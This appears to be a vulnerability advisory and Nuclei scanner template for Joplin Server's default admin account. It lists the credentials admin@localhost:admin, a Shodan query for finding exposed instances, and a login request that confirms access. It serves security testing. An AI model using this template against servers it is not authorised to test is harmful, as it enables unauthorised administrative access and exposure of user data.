Joplin Server installations are vulnerable to default administrative credentials. The system ships with a default admin account using the credentials admin@localhost:admin. Attackers can leverage these default credentials to gain administrative access to the Joplin Server instance, potentially compromising sensitive user data and system functionality.
PoC代码[已公开]
id: joplin-default-login
info:
name: Joplin - Default Login
author: pussycat0x
severity: high
description: |
Joplin Server installations are vulnerable to default administrative credentials. The system ships with a default admin account using the credentials admin@localhost:admin. Attackers can leverage these default credentials to gain administrative access to the Joplin Server instance, potentially compromising sensitive user data and system functionality.
metadata:
verified: true
shodan-query: 'title:"Joplin Server"'
max-request: 1
tags: joplin,oss,default-login,vuln
variables:
username: admin@localhost
password: admin
http:
- raw:
- |
POST /api/sessions HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"email": "{{username}}",
"password": "{{password}}"
}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body,"user_id","id")'
- 'contains(content_type,"application/json")'
condition: and
# digest: 490a00463044022022de2b1b75e25e9b2345f08ddb1391df037c97ebe452d5c78f743c9dee5a2b83022003c11511b58c096898cc129e7990455b5d92f4017e647ccf4c404cf7a66bf4d3:922c64590222798bb761d5b6d8e72950